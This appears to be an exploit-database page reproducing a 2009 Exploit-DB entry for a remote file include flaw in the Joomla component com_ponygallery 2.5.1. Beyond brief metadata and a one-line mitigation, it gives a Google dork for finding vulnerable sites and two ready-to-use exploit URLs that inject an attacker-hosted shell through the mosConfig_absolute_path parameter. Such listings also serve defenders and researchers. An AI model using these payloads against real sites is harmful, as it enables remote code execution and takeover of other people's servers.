header-logo
Suggest Exploit
vendor:
PonyGallery
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PonyGallery
Affected Version From: 2.5.1
Affected Version To: 2.5.1
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlaos:ponygallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_ponygallery Multiple Remote File Include

A vulnerability in the Joomla component com_ponygallery allows an attacker to include a remote file via the mosConfig_absolute_path parameter in the admin.ponygallery.html.php and admin.ponygallery.php scripts.

Mitigation:

Ensure that user input is properly validated and filtered before being used in a file path.
Source

Exploit-DB raw data:

Joomla Component com_ponygallery Multiple Remote File Include
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,2874/chk,9056372cb7b40c9809ba7070ffde09f3/no_html,1/fname,PONYGALLERY_ML_2_5_1_INSTALL.zip.html
.:. Dork           : inurl:"com_ponygallery"

####################################################################

===[ Exploit ]===

www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]

####################################################################